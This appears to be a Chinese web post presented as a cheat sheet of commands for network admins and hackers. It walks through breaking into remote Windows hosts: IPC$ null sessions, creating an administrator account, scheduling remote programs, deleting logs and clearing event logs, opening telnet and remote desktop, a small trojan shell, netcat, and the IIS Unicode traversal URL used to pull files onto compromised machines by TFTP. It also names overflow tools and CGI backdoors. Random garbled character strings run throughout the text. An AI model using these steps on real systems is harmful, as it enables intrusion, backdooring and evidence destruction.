网管和黑客都必须知道的命令

admin

　　与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" 　　以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" * G- ^. c- F: l- G( L　　传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ 　　查看远程主机时间 net time \IP地址 1 \/ y/ k$ s! k3 M* K　　定时启动某个程序 at \IP地址 02:18 readme.exe 　　查看共享 net view \IP地址 　　查看netbios工作组列表 nBTstat -A IP地址 　　将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" : I6 I& F8 w# y+ J2 ~' w　　这两条把自己增加到管理员组： net user 用户名 密码 /add 　　net locaLGroup Administrators 用户名 /add / A/ M+ [7 J+ f3 K ]3 p: B- [　　断开连接 net use \IP地址ipc$ /delete $ R7 E4 W) a4 { Y9 b+ K 　　扫尾： 　　del C:winntsystem32logfiles*.* 6 ]7 ~0 O: ^$ n0 Y5 b　　del C:winntssytem32config*.evt : l) a* `& V& A0 \4 F. G! i3 O" M8 v　　del C:winntsystem32dTCLog*.* 0 u, T3 |8 |; S& y　　del C:winntsystem32*.log # c2 F% N5 P, v* f9 X9 V6 b　　del C:winntsystem32*.txt 　　del C:winnt*.txt 6 t9 \# o0 p0 L& u　　del C:winnt*.log 6 Q( \5 _! ^3 R- S 一、netsvc.exe 9 X+ }+ D0 o0 W0 i" [4 ]; R　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务： 　　netsvc /list \IP地址 9 c( T1 }& C- x. y5 E　　netsvc schedule \IP地址 /query 4 E1 W* U+ l" ]. Z' R　　netsvc \IP地址 schedule /start - [ l1 l9 L) z3 e' I2 r5 v2 g2 e 二、OpenTelnet.exe 　　远程启动主机的Telnet服务，并绑定端口到7878，例如： 　　OpenTelnet \IP地址 用户名 密码 1 7878 5 O3 B+ b( u. I7 J5 |/ ]　　然后就可以telnet到主机的7878端口，进入DOS方式下： 　　telnet IP地址 7878 , _0 _7 Q) w. C, s8 ]7 U三、winshell.exe 　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令： 　　p Path （查看winshell主程序的路径信息） + `3 i: E5 I; a/ P! A. @　　b reBoot （重新启动机器） 3 @. g. n- [/ f$ g% O　　d shutDown （关闭机器） 　　s Shell （执行后你就会看到可爱的“C:>”） : @- N w6 H7 i' x" q B& R; }& |　　x eXit （退出本次登录会话，此命令并不终止winshell的运行） / ?5 m% |4 H$ ^　　CMD> http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上） 3 J3 J! A4 {4 `! w $ V# |% n& a' Y7 d; f* r四、3389登陆器，GUI方式登录远程主机的 5 ~2 V6 ~8 U8 {9 j五、elsave.exe 2 f# O7 K! F& u) \" j　　事件日志清除工具 3 P$ p$ N+ ^8 P6 S4 n, |　　elsave -s \IP地址 -l "application" -C 　　elsave -s \IP地址 -l "system" -C 　　elsave -s \IP地址 -l "security" -C 0 E$ v" T9 w) X7 L- Y　　执行后成功清除应用程序日志，系统日志，安全日志 4 f" U8 v. b. I, j8 O$ N六、hbulot.exe 　　开启win2kserver和winxp的3389服务 　　hbulot （/r） 9 M/ U3 H9 I: _5 y+ U 七、nc.exe(netcat.exe) 　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。 & M" ?! F3 i) s2 s9 F. O! p　　想要连接到某处: nc （-options） hostname port（s）（ports） ... 　　绑定端口等待连接: nc -l -p port （-options） （hostname） （port） 参数: 　　-e prog 程序重定向，一旦连接，就执行 （危险!） m! L1 V$ o P6 K4 x" a% z　　-g gateway source-routing hop point（s）, up to 8 　　-G num source-routing pointer: 4, 8, 12, ... 　　-h 帮助信息 　　-i secs 延时的间隔 - X, R5 N1 F) Z5 |: x6 ?6 }/ ^　　-l 监听模式，用于入站连接 　　-n 指定数字的IP地址，不能用hostname 　　-o file 记录16进制的传输 % F0 x4 z$ S& O/ b　　-p port 本地端口号 2 b0 Y- g) S% u& M　　-r 任意指定本地及远程端口 # g( N, S; V3 p+ q4 m L　　-s addr 本地源地址 ! u- G; q* W5 }　　-u UDP模式 . l" \& l# e* j+ ` K　　-v 详细输出——用两个-v可得到更详细的内容 　　-w secs timeout的时间 　　-z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE 　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如： . x8 b/ E- F: f; @　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 1 I7 e7 B2 b: O$ y+ }$ o. m　　然后可以直接令文件运行： 　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 : h2 t4 }, p/ ~九、prihack.exe是IIS的printer远程缓冲区溢出工具 ) q& y4 Y- ^1 ?8 S; a F2 y0 P　　idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。 " u' k3 j, y* E! r' g 8 _* m; a; C1 G( {4 q6 B. I+ a7 S一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接.